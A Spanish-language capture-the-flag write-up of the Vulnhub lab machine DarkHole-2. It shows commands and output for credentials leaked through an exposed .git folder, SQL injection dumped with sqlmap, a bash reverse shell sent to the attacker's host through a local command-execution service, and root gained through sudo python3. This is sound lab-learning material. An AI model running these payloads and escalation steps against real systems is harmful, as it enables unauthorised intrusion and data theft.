DarkHole:2 - WriteUp

¡Buenas! Hoy estaremos resolviendo la máquina DarkHole-2 de la plataforma Vulnhub, comencemos…

Enumeración.

Lo primero será lanzar un escaneo de puertos con nmap:

❯ nmap -sS --min-rate 5000 -sCV --open -n -Pn -p- -oN Ports 192.168.1.83
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-24 19:01 CET
Nmap scan report for 192.168.1.83
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   192.168.1.83:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
MAC Address: 00:0C:29:BA:C3:82 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

Podemos observar que están abiertos los puertos:

  • 22 -> SSH
  • 80 -> HTTP

Si accedemos al puerto 80 podemos ver un panel de login del cual no tenemos credenciales. Pero si nos fijamos en el escaneo de nmap podemos ver que hemos descubierto un directorio /.git/

Vamos a descargarnos de forma recursiva el directorio para enumerarlo.

❯ wget --recursive 192.168.1.83:80/.git/

Nos hemos descargado los siguientes archivos/carpetas:

ls -la
drwxr-xr-x xxx xxx  66 B  Tue Jan 24 19:10:44 2023  .
drwxr-xr-x xxx xxx  40 B  Tue Jan 24 19:10:44 2023  ..
drwxr-xr-x xxx xxx 436 B  Tue Jan 24 19:10:44 2023  .git
drwxr-xr-x xxx xxx  76 B  Tue Jan 24 19:10:44 2023  icons
drwxr-xr-x xxx xxx  70 B  Tue Jan 24 19:10:45 2023  style
.rw-r--r-- xxx xxx 740 B  Tue Jan 24 19:10:44 2023  index.html
.rw-r--r-- xxx xxx 1.0 KB Tue Jan 24 19:10:44 2023  login.php

Ahora vamos a hacer uso de la herramienta git para ver los commits que se han hecho a lo largo de desarrollo de lo que parece una aplicación web.

❯ git log
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300

    i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300

    First Initialize

Podemos ver que el commit a4d900a8d85e8938d3601f3cef113ee293028e10 ha añadido al fichero login.php unas credenciales por defecto. Vamos a seguir haciendo uso de la herramienta git para acceder a ese commit.

❯ git show a4d900a                                                                                                                                                                           
commit a4d900a8d85e8938d3601f3cef113ee293028e10                                                                                                                                              
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

diff --git a/login.php b/login.php
index e69de29..8a0ff67 100644
--- a/login.php
+++ b/login.php
@@ -0,0 +1,42 @@
+<?php
+session_start();
+require 'config/config.php';
+if($_SERVER['REQUEST_METHOD'] == 'POST'){
+    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
+        $_SESSION['userid'] = 1;
+        header("location:dashboard.php");
+        die();
+    }

Vemos unas credenciales y un correo en texto plano

  • lush@admin.com:321

Explotación

Si probamos a iniciar sesión con estos datos podremos a acceder a la aplicación web. En ella podremos actualizar nuestros datos de perfil. Si nos fijamos en la url podremos observar un parámetro id que es vulnerable a SQLI error based

Vamos a hacer uso de la herramienta SQLMAP para extraer las bases de datos existentes.

❯ sqlmap -u "http://192.168.1.83/dashboard.php?id=1" --cookie "PHPSESSID=m4p16840eqi6g1alsg4phhbi6m" -D darkhole_2 --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:28:03 /2023-01-24/

[19:28:04] [INFO] resuming back-end DBMS 'mysql' 
[19:28:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1888 FROM (SELECT(SLEEP(5)))CTUu) AND 'LLdB'='LLdB

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-8315' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178626a71,0x566363776d5573774f7a77506458427547515a41465456786f6c6643454a524f696f426a72564775,0x717a7a7a71),NULL-- -
---
[19:28:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:28:04] [INFO] fetching tables for database: 'darkhole_2'
[19:28:04] [INFO] fetching columns for table 'ssh' in database 'darkhole_2'
[19:28:04] [INFO] fetching entries for table 'ssh' in database 'darkhole_2'
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user   |
+----+------+--------+
| 1  | fool | jehad  |
+----+------+--------+

[19:28:04] [INFO] table 'darkhole_2.ssh' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.83/dump/darkhole_2/ssh.csv'
[19:28:04] [INFO] fetching columns for table 'users' in database 'darkhole_2'
[19:28:04] [INFO] fetching entries for table 'users' in database 'darkhole_2'
Database: darkhole_2
Table: users
[1 entry]
+----+----------------+---------------+----------+-----------------------------+----------------+
| id | email          | address       | password | username                    | contact_number |
+----+----------------+---------------+----------+-----------------------------+----------------+
| 1  | lush@admin.com | <h1>test</h1> | 321      | Jehad Alqurashiasddasdasdas | 1111111111     |
+----+----------------+---------------+----------+-----------------------------+----------------+

[19:28:04] [INFO] table 'darkhole_2.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.83/dump/darkhole_2/users.csv'
[19:28:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.83'
[19:28:04] [WARNING] your sqlmap version is outdated

[*] ending @ 19:28:04 /2023-01-24/

Hemos extraído un usuario y contraseña de la tabla ssh de la base de datos DarkHole2:

  • jehad:fool

Privesc

Con estos datos podemos iniciar sesión por SSH

❯ ssh jehad@192.168.1.83
jehad@192.168.1.83's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 24 Jan 2023 06:30:22 PM UTC

  System load:  0.03               Processes:              234
  Usage of /:   52.3% of 12.73GB   Users logged in:        0
  Memory usage: 21%                IPv4 address for ens33: 192.168.1.83
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

249 updates can be applied immediately.
180 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

New release '22.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Tue Jan 24 17:13:33 2023 from 192.168.1.42
jehad@darkhole:~$ id
uid=1001(jehad) gid=1001(jehad) groups=1001(jehad)
jehad@darkhole:~$

Si enumeramos el historial del usuario podemos observar que hace unas peticiones web a un puerto local –> 9999 pasándole un comando por GET al parámetro cmd

jehad@darkhole:~$ head .bash_history 
clear
ls -la
cat id_rsa
clear
netstat -tulpn | grep LISTEN
ssh -L 127.0.0.1:9999:192.168.135.129:9999 jehad@192.168.135.129
curl http://localhost:9999
curl "http://localhost:999/?cmd=id" 
curl "http://localhost:9999/?cmd=id" 
curl http://localhost:9999/

Al tratar de hacer esas peticiones podemos ver que se están ejecutando como otro usuario del sistema (losy).

jehad@darkhole:~$ curl "http://127.0.0.1:9999/?cmd=id"
Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
uid=1002(losy) gid=1002(losy) groups=1002(losy)

Vamos a tratar de escalar privilegios y conseguir una shell como este usuario. Para ello nos pondremos a la escucha con netcat por el puerto 443 en nuestra máquina local.

❯ nc -lvvp 443
listening on [any] 443 ...

Y ahora ejecutaremos el siguiente comando en la máquina víctima:

jehad@darkhole:~$ curl -G http://127.0.0.1:9999/ --data-urlencode "cmd= bash -c 'bash -i >& /dev/tcp/192.168.1.42/443 0>&1'"

Si revisamos nuestro listener veremos que hemos obtenido una revshell.

❯ nc -lvvp 443
listening on [any] 443 ...
192.168.1.83: inverse host lookup failed: Unknown host
connect to [192.168.1.42] from (UNKNOWN) [192.168.1.83] 37822
bash: cannot set terminal process group (1165): Inappropriate ioctl for device
bash: no job control in this shell
losy@darkhole:/opt/web$ id
id
uid=1002(losy) gid=1002(losy) groups=1002(losy)
losy@darkhole:/opt/web$

Ahora podremos leer la flag de usuario. Si seguimos enumerando, al igual que antes, podremos encontrar datos en nuestro historial de comandos de usuario.

losy@darkhole:~$ cat .bash_history                                                                                                                                                           
cd .ssh/                                                                                                                                                                                     
chmod 666 id_rsa                                                                                                                                                                             
php -S localhost:9999                                                                                                                                                                        
clear                                                                                                                                                                                        
sudo su                                                                                                                                                                                      
su lama                                                                                                                                                                                      
clear                                                                                                                                                                                        
ls -la                                                                                                                                                                                       
cat /etc/crontab                                                                                                                                                                             
su lama                                                                                                                                                                                      
mkdir web                                                                                                                                                                                    
ls -la                                                                                                                                                                                       
su lama                                                                                                                                                                                      
ls                                                                                                                                                                                           
touch index.php                                                                                                                                                                              
cd ..                                                                                                                                                                                        
ls                                                                                                                                                                                           
ls -la                                                                                                                                                                                       
sudo su                                                                                                                                                                                      
c                                                                                                                                                                                            
clear                                                                                                                                                                                        
su lama                                                                                                                                                                                      
clear                                                                                                                                                                                        
su lama                                                                                                                                                                                      
mysql -e '\! /bin/bash'                                                                                                                                                                      
mysql -u root -p -e '\! /bin/bash'
P0assw0rd losy:gang

Podemos observar unas credenciales que corresponden con nuestro usuario “losy”

  • losy:gang

Si miramos nuestros privilegios de sudo vemos que podemos ejecutar como root python3.

losy@darkhole:~$ sudo -l
[sudo] password for losy: 
Matching Defaults entries for losy on darkhole:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User losy may run the following commands on darkhole:
    (root) /usr/bin/python3

Ahora podremos escalar privilegios y convertirnos en usuario root de una forma sencilla. Importando la libreria os.py podremos ejecutar comandos a nivel de sistema.

losy@darkhole:~$ sudo python3
Python 3.8.10 (default, Jun  2 2021, 10:49:15) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('bash')
root@darkhole:/home/losy#